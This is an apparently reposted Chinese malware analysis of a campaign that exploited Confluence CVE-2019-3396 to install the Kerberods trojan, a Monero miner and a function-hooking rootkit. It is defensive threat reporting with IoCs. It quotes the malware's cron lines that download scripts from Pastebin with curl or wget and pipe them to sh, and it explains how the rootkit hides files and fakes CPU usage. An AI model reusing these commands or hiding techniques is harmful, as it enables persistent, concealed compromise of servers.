使用Rootkit实现恶意挖矿:CVE-2019-3396漏洞新型恶意利用方式分析

栏目: 编程工具 · 发布时间: 5年前

内容简介:概述Confluence是一个广泛使用的协作与规划软件。在2019年3月,Atlassian发布了一份咨询报告,涉及到两个Confluence的关键漏洞。4月,我们观察到其中一个漏洞,即工具连接器漏洞CVE-2019-3396被威胁参与者恶意利用以执行恶意攻击。安全提供商Alert Logic还发现该漏洞被利用于投放Gandcrab勒索软件。上述这些事件,应该不会是我们最后一次发现CVE-2019-3396的开发利用事件,因为威胁行为者仍然在寻找利用此漏洞的新方法。我们发现,该漏洞还被利用于提供一个加密货币

概述

Confluence是一个广泛使用的协作与规划软件。在2019年3月,Atlassian发布了一份咨询报告,涉及到两个Confluence的关键漏洞。4月,我们观察到其中一个漏洞,即 工具 连接器漏洞CVE-2019-3396被威胁参与者恶意利用以执行恶意攻击。安全提供商Alert Logic还发现该漏洞被利用于投放Gandcrab勒索软件。

上述这些事件,应该不会是我们最后一次发现CVE-2019-3396的开发利用事件,因为威胁行为者仍然在寻找利用此漏洞的新方法。我们发现,该漏洞还被利用于提供一个加密货币挖掘的恶意软件,其中包含一个旨在隐藏其活动的Rootkit。这种技术很容易让我们联想到2018年11月发生的另一起使用挖矿工具+Rootkit组合的攻击。

投放和传播

该恶意活动的感染链如下:

使用Rootkit实现恶意挖矿:CVE-2019-3396漏洞新型恶意利用方式分析

在攻击开始时,首先发送一个远程命令,从Pastebin下载 Shell 脚本(hxxps://pastebin[.]com/MjGrx7EA)。

该Shell脚本会终止某些进程,然后从另一个Pastebin(hxxps://pastebin[.]com/CvJM3qz5)下载并执行lsd_1文件。该文件是第二个Shell脚本,它会投放第三个Shell脚本lsd_2,该脚本来自另一个Pastebin(hxxps://pastebin[.]com/a3EAddwq)。

这一Shell脚本负责从下面的服务器中,下载木马程序:

gwjyhs[.]com
img[.]sobot[.]com

恶意软件Kerberods(检测为Trojan.Linux.KERBERDS.A)是一个自定义打包的二进制文件,该恶意软件会通过cron任务来自行安装:

*/10* * * * curl -fsSL hxxps://pastebin[.]com/raw/60T3uCcb|sh
*/15* * * * wget -q -O- hxxps://pastebin[.]com/raw/60T3uCcb|sh
*/10* * * * root curl -fsSL hxxps://pastebin[.]com/raw/60T3uCcb|sh
*/15* * * * root wget -q -O- hxxps://pastebin[.]com/raw/60T3uCcb|sh
*/15* * * * (curl -fsSL hxxps://pastebin[.]com/raw/rPB8eDpu||wget -q -O-hxxps://pastebin[.]com/raw/rPB8eDpu)|sh

Kerberods负责投放加密货币挖掘工具(khugepageds,检测为Coinminer.Linux.MALXMR.UWEJI)及Rootkit组件。

在这里,有一个非常值得关注的地方,就是二进制文件投放Rootkit的方式。首先,它将Rootkit的代码写入名为/usr/local/lib/{random filename}.c的文件中。

使用Rootkit实现恶意挖矿:CVE-2019-3396漏洞新型恶意利用方式分析

然后,通过gcc编译Rootkit,输出二进制文件到/usr/local/lib/{random filename}.so。

编译Rootkit代码:

使用Rootkit实现恶意挖矿:CVE-2019-3396漏洞新型恶意利用方式分析

Kerberods还有多种传播方式,比如利用CVE-2019-1003001和CVE-2019-1003000漏洞通过SSH方式传播。

至于khugepageds,它是一个XMRig 2.14.1-mo1 门罗币(Monero)挖矿工具,该挖矿的配置信息以硬编码的形式保存到二进制文件中:

挖矿工具的配置:

使用Rootkit实现恶意挖矿:CVE-2019-3396漏洞新型恶意利用方式分析

我们可以在systemten[.]org:51640访问该挖矿工具所使用的矿池。

使用Rootkit逃避检测

如前文所述,此次攻击与去年发生的攻击事件具有许多相同的特征,例如:都使用了Pastebin作为C&C服务器、挖矿Payload相同、使用Rootkit来隐藏恶意软件。

与Kerberods一样,挖矿工具Payload也是用自定义加壳工具来防止安全研究人员的分析。

使用Rootkit实现恶意挖矿:CVE-2019-3396漏洞新型恶意利用方式分析

与仅对readdir函数进行挂钩从而隐藏挖矿进程的旧版本Rootkit不同,新版本对更多函数进行了挂钩。在新版本中,不仅隐藏了挖矿进程,还隐藏了某些文件和网络流量。除此之外,还能够伪造主机的CPU使用率。

新版本恶意软件挂钩的函数包括:

fopen、fopen64、lstat、lxstat、open、rmdir、stat、stat64、__xstat、__xstat64、unlink、unlinkat、opendir、readdir、readdir6。

如果它们的参数中包含诸如rootkit、miner或ld.so.preload这样的文件名,那么大多数挂钩函数都会返回“No such file or directory error”(无此类文件或目录错误)。

被挂钩的函数返回错误,以隐藏恶意软件感染的迹象:

使用Rootkit实现恶意挖矿:CVE-2019-3396漏洞新型恶意利用方式分析

下图展示了加载Rootkit时和未加载Rootkit时的htop系统监控输出。我们可以重点关注加载Rootkit后如何隐藏CPU使用率和挖矿过程。

下图为htop系统监控工具的输出,左图为未加载Rootkit时,右图为加载Rootkit时:

使用Rootkit实现恶意挖矿:CVE-2019-3396漏洞新型恶意利用方式分析

下图为netstat的输出,左图为未加载Rootkit时,右图为加载Rootkit时:

使用Rootkit实现恶意挖矿:CVE-2019-3396漏洞新型恶意利用方式分析

下图为伪造CPU使用率和TCP连接的函数:

使用Rootkit实现恶意挖矿:CVE-2019-3396漏洞新型恶意利用方式分析

伪造网络流量:

使用Rootkit实现恶意挖矿:CVE-2019-3396漏洞新型恶意利用方式分析

伪造CPU使用率:

使用Rootkit实现恶意挖矿:CVE-2019-3396漏洞新型恶意利用方式分析

Rootkit还将挂钩访问函数作为一种持久化的方式,以便创建一个cron任务,从而在该任务被调用时重新安装恶意软件。

下图展示了用于下载和执行Kerberods的cron任务代码:

使用Rootkit实现恶意挖矿:CVE-2019-3396漏洞新型恶意利用方式分析

安全建议和解决方案

在很短的时间内,我们就已经看到了多起利用CVE-2019-3396的实际攻击事件。这表明网络犯罪分子致力于(并且能够)以多种方式滥用当前最新的漏洞。因此,作为防御者,更应该开展持续监控,以检测组织中存在的任何威胁。

为了进行有效地监控,组织可以使用混合云安全解决方案,该解决方案可以针对DevOps提供强大、简单和自动化的安全保障。此外,该方案中还具有多种威胁防御技术,用于保护物理主机、虚拟主机和云主机。借助一些服务器深度安全防护系统,可以帮助DevOps和安全团队在预运行和运行时扫描容器映像,并确保其安全性。

该恶意活动的检测规则为:

·Atlassian Confluence服务器远程执行代码漏洞(CVE-2019-3396)

IoC

kerberods(加密货币挖掘二进制文件)

· SHA-256:a9228b6a3fe0b8375d6b881626fd4b59fbbf54dbd60a94b085ee0455b3d18fe9

· 检测名称:Trojan.Linux.KERBERDS.A

Khugepageds(加密货币挖掘恶意软件)

· SHA-256:25064a5ab78cdd36e7049d00b9319222906dd634908c1858e2262bf333631213

· 检测名称:Coinminer.Linux.MALXMR.UWEJI

random.so(Rootkit)

· SHA-256:3392589c9ebbf7600035574e338d69625cd5ce83ee655582fe8bbadb663532b3

· 检测名称:Rootkit.Linux.KERBERDS.A


以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

从零开始做产品经理

从零开始做产品经理

萧七公子 / 中国华侨出版社 / 2016-12-1 / 27.9

《从零开始做产品经理:产品经理的第一本书》根据产品经理的能力需求与成长体系,共分为八章内容,从了解产品开始,到挖掘用户需求、进行产品设计、管理团队、进行项目管理、产品运营、把握产品的生命周期,以及产品经理的成长路径,全面阐释了产品经理的修炼之道。《从零开始做产品经理:产品经理的第一本书》书中信息量大,图文并茂,论点与论据相得益彰,并且融合了丰富的案例与故事,使得整个阅读过程妙趣横生而且迅速开“悟道......一起来看看 《从零开始做产品经理》 这本书的介绍吧!

JSON 在线解析
JSON 在线解析

在线 JSON 格式化工具

HTML 编码/解码
HTML 编码/解码

HTML 编码/解码

Base64 编码/解码
Base64 编码/解码

Base64 编码/解码